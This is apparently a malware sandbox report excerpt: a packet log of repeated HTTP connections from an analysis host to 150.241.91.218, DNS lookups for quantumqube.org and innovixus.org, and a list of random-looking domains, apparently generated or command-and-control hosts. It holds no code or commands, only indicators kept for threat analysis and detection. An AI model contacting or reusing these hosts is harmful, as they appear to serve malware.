                                                                                                                                                              Nov 6, 2024 17:40:51.649394035 CET5037680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:51.649394035 CET5037680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:51.837434053 CET8050376150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:51.837496996 CET8050376150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:51.908107996 CET8050376150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:51.924844027 CET5037680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:51.925296068 CET5037780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:52.113187075 CET8050377150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:52.113287926 CET8050376150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:52.113370895 CET5037780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:52.113447905 CET5037680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:52.113526106 CET5037780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:52.113526106 CET5037780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:52.301639080 CET8050377150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:52.301649094 CET8050377150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:52.374219894 CET8050377150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:52.385225058 CET5037780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:52.385664940 CET5037880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:52.575807095 CET8050377150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:52.575818062 CET8050378150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:52.575985909 CET5037780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:52.576040030 CET5037880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:52.576169968 CET5037880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:52.576169968 CET5037880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:52.771966934 CET8050378150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:52.771977901 CET8050378150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:52.837337971 CET8050378150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:52.856216908 CET5037880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:52.856841087 CET5037980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:53.044573069 CET8050378150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:53.044584990 CET8050379150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:53.044755936 CET5037880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:53.044755936 CET5037980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:53.044898987 CET5037980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:53.044898987 CET5037980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:53.232356071 CET8050379150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:53.232765913 CET8050379150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:53.300205946 CET8050379150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:53.315784931 CET5037980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:53.316252947 CET5038080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:53.504854918 CET8050379150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:53.505069971 CET5037980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:53.505390882 CET8050380150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:53.505537987 CET5038080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:53.505681038 CET5038080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:53.505729914 CET5038080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:53.693598032 CET8050380150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:53.693614960 CET8050380150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:53.764902115 CET8050380150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:53.780936956 CET5038080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:53.781445026 CET5038180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:53.968899965 CET8050380150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:53.969178915 CET5038080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:53.969443083 CET8050381150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:53.969583988 CET5038180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:53.969779015 CET5038180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:53.969779015 CET5038180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:54.157800913 CET8050381150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:54.157812119 CET8050381150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:55.239634991 CET8050381150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:55.251482010 CET5038180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:55.252096891 CET5038280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:55.439851999 CET8050381150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:55.440057993 CET5038180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:55.440098047 CET8050382150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:55.440304041 CET5038280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:55.440455914 CET5038280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:55.440455914 CET5038280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:55.628403902 CET8050382150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:55.628452063 CET8050382150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:55.694339991 CET8050382150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:55.705168962 CET5038280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:55.705598116 CET5038380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:55.894304037 CET8050382150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:55.894454002 CET5038280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:55.895636082 CET8050383150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:55.895857096 CET5038380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:55.896044016 CET5038380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:55.896044016 CET5038380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:56.084192991 CET8050383150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:56.084224939 CET8050383150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:56.154642105 CET8050383150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:56.174827099 CET5038380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:56.175542116 CET5038480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:56.362690926 CET8050383150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:56.362855911 CET5038380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:56.363641024 CET8050384150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:56.363827944 CET5038480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:56.363913059 CET5038480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:56.363913059 CET5038480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:56.551878929 CET8050384150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:56.552069902 CET8050384150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:56.620718956 CET8050384150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:56.633367062 CET5038480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:56.633903027 CET5038580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:56.821705103 CET8050384150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:56.821978092 CET5038480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:56.822433949 CET8050385150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:56.822640896 CET5038580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:56.822751999 CET5038580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:56.822751999 CET5038580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:57.010809898 CET8050385150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:57.010818005 CET8050385150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:57.178894043 CET8050385150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:57.196775913 CET5038580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:57.197514057 CET5038680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:57.384850979 CET8050385150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:57.385065079 CET5038580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:57.385869980 CET8050386150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:57.386126995 CET5038680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:57.386248112 CET5038680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:57.386248112 CET5038680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:57.573782921 CET8050386150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:57.573792934 CET8050386150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:57.641237020 CET8050386150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:57.658809900 CET5038680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:57.659758091 CET5038780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:57.846731901 CET8050386150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:57.846993923 CET5038680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:57.848139048 CET8050387150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:57.848340034 CET5038780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:57.848488092 CET5038780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:57.848488092 CET5038780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:58.036011934 CET8050387150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:58.036031961 CET8050387150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:58.107455969 CET8050387150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:58.119896889 CET5038780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:58.120402098 CET5038880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:58.307384014 CET8050387150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:58.307559967 CET5038780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:58.308022022 CET8050388150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:58.308264017 CET5038880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:58.308404922 CET5038880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:58.308404922 CET5038880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:58.496079922 CET8050388150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:58.496104956 CET8050388150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:58.562258959 CET8050388150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:58.578986883 CET5038880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:58.579556942 CET5038980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:58.767065048 CET8050388150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:58.767268896 CET8050389150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:58.767313004 CET5038880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:58.767486095 CET5038980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:58.767636061 CET5038980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:58.767636061 CET5038980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:58.955276012 CET8050389150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:58.955308914 CET8050389150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:59.321832895 CET8050389150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:59.340162039 CET5038980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:59.340747118 CET5039080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:59.528003931 CET8050389150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:59.528158903 CET5038980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:59.528594971 CET8050390150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:59.528857946 CET5039080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:59.529191971 CET5039080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:59.529191971 CET5039080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:59.717217922 CET8050390150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:59.717242956 CET8050390150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:59.788629055 CET8050390150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:59.804369926 CET5039080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:59.805030107 CET5039180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:59.992706060 CET8050390150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:59.992733002 CET8050391150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:59.992909908 CET5039080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:59.992988110 CET5039180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:59.993257046 CET5039180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:59.993257046 CET5039180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:00.181061983 CET8050391150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:00.181195021 CET8050391150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:00.258084059 CET8050391150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:00.274570942 CET5039180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:00.274996042 CET5039280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:00.462770939 CET8050391150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:00.462990046 CET5039180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:00.463478088 CET8050392150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:00.463705063 CET5039280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:00.463875055 CET5039280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:00.463876009 CET5039280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:00.651858091 CET8050392150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:00.651891947 CET8050392150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:00.720617056 CET8050392150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:00.731667995 CET5039280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:00.732070923 CET5039380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:00.923058987 CET8050392150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:00.923156023 CET8050393150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:00.923268080 CET5039280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:00.923361063 CET5039380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:00.923476934 CET5039380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:00.923476934 CET5039380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:01.112951040 CET8050393150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:01.112967014 CET8050393150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:02.195641994 CET8050393150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:02.210813999 CET5039380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:02.211373091 CET5039480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:02.399039030 CET8050394150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:02.399050951 CET8050393150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:02.399280071 CET5039380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:02.399280071 CET5039480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:02.402256012 CET5039480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:02.402256012 CET5039480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:02.589988947 CET8050394150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:02.590004921 CET8050394150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:02.660482883 CET8050394150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:02.671245098 CET5039480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:02.671773911 CET5039580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:02.858849049 CET8050394150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:02.859200001 CET5039480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:02.859292984 CET8050395150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:02.859484911 CET5039580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:02.859592915 CET5039580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:02.859592915 CET5039580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:03.047183990 CET8050395150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:03.047385931 CET8050395150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:03.118341923 CET8050395150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:03.130204916 CET5039580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:03.130642891 CET5039680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:03.319108963 CET8050395150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:03.319340944 CET5039580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:03.319410086 CET8050396150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:03.319629908 CET5039680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:03.319819927 CET5039680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:03.319819927 CET5039680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:03.507669926 CET8050396150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:03.507747889 CET8050396150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:03.579761982 CET8050396150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:03.590471983 CET5039680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:03.592055082 CET5039780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:03.778923988 CET8050396150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:03.779097080 CET5039680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:03.779658079 CET8050397150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:03.779830933 CET5039780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:03.780061007 CET5039780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:03.780061007 CET5039780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:03.968236923 CET8050397150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:03.968252897 CET8050397150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:04.035576105 CET8050397150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:04.046622992 CET5039780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:04.047123909 CET5039880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:04.238137960 CET8050397150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:04.238343954 CET8050398150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:04.238388062 CET5039780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:04.238905907 CET5039880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:04.238905907 CET5039880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:04.239097118 CET5039880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:04.426990032 CET8050398150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:04.427010059 CET8050398150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:04.494916916 CET8050398150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:04.507837057 CET5039880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:04.508280039 CET5039980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:04.695909023 CET8050398150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:04.696244955 CET5039880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:04.696427107 CET8050399150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:04.696742058 CET5039980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:04.696902037 CET5039980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:04.696902990 CET5039980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:04.885164976 CET8050399150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:04.885190010 CET8050399150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:04.952537060 CET8050399150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:04.964287043 CET5039980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:04.964720011 CET5040080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:05.152731895 CET8050399150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:05.152930021 CET5039980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:41:05.152956963 CET8050400150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:41:05.153167009 CET5040080192.168.11.20150.241.91.218
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Nov 6, 2024 17:32:39.126650095 CET5893553192.168.11.201.1.1.1
                                                                                                                                                              Nov 6, 2024 17:32:39.238590002 CET53589351.1.1.1192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:01.890266895 CET5914853192.168.11.201.1.1.1
                                                                                                                                                              Nov 6, 2024 17:34:02.020011902 CET53591481.1.1.1192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:02.856492043 CET5605653192.168.11.201.1.1.1
                                                                                                                                                              Nov 6, 2024 17:34:02.990787983 CET53560561.1.1.1192.168.11.20
                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                              Nov 6, 2024 17:32:39.126650095 CET192.168.11.201.1.1.10x7965Standard query (0)zYiUXMmoWYKVkgToRt.zYiUXMmoWYKVkgToRtA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 6, 2024 17:34:01.890266895 CET192.168.11.201.1.1.10x64feStandard query (0)quantumqube.orgA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 6, 2024 17:34:02.856492043 CET192.168.11.201.1.1.10x8ae1Standard query (0)innovixus.orgA (IP address)IN (0x0001)false
                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                              Nov 6, 2024 17:32:39.238590002 CET1.1.1.1192.168.11.200x7965Name error (3)zYiUXMmoWYKVkgToRt.zYiUXMmoWYKVkgToRtnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 6, 2024 17:34:02.020011902 CET1.1.1.1192.168.11.200x64feNo error (0)quantumqube.org85.192.60.190A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 6, 2024 17:34:02.990787983 CET1.1.1.1192.168.11.200x8ae1No error (0)innovixus.org150.241.91.218A (IP address)IN (0x0001)false
                                                                                                                                                              • jyevwpjwtgxg.net
                                                                                                                                                                • quantumqube.org
                                                                                                                                                              • dfeuyduiilfsy.com
                                                                                                                                                                • innovixus.org
                                                                                                                                                              • lnnmtmdpxvygnco.net
                                                                                                                                                              • ygvupudcfqtouxhu.net
                                                                                                                                                              • xspsemcvfgoiut.net
                                                                                                                                                              • pjhnwrnkjwbushkd.net
                                                                                                                                                              • jbnqovqgrlresuvo.net
                                                                                                                                                              • jvdddppcdqqqda.net
                                                                                                                                                              • ljcmwxchutvr.net
                                                                                                                                                              • lufxgmktwrqcp.net
                                                                                                                                                              • pyqjpqeimfnbipd.com
                                                                                                                                                              • fggyvuvhssd.com
                                                                                                                                                              • hlfrlthjcrvobluk.org
                                                                                                                                                              • cgsbdsjlngetne.org
                                                                                                                                                              • eukmigsrvyb.org
                                                                                                                                                              • aydyulcorcfg.com
                                                                                                                                                              • irahodakkogrt.com
                                                                                                                                                              • xynwwxaaxctjsnke.com
                                                                                                                                                              • ghsxueypspuw.com
                                                                                                                                                              • dxcstthegjtyiuv.com
                                                                                                                                                              • jegntitrwah.net
                                                                                                                                                              • fflfeclqdvs.org
                                                                                                                                                              • dqgpuokjonbaxi.com
                                                                                                                                                              • lseeiaoqpwqavr.com
                                                                                                                                                              • aijvngmrwrpbae.com
                                                                                                                                                              • aahwanpjvkrdt.org
                                                                                                                                                              • vocyfosbdidhx.com
                                                                                                                                                              • kybgadnxuheufnw.com
                                                                                                                                                              • hehgxpqemmxhtl.org
                                                                                                                                                              • ljfejfsbbbqwrlh.com
                                                                                                                                                              • ayqexcuflcavkdwn.net
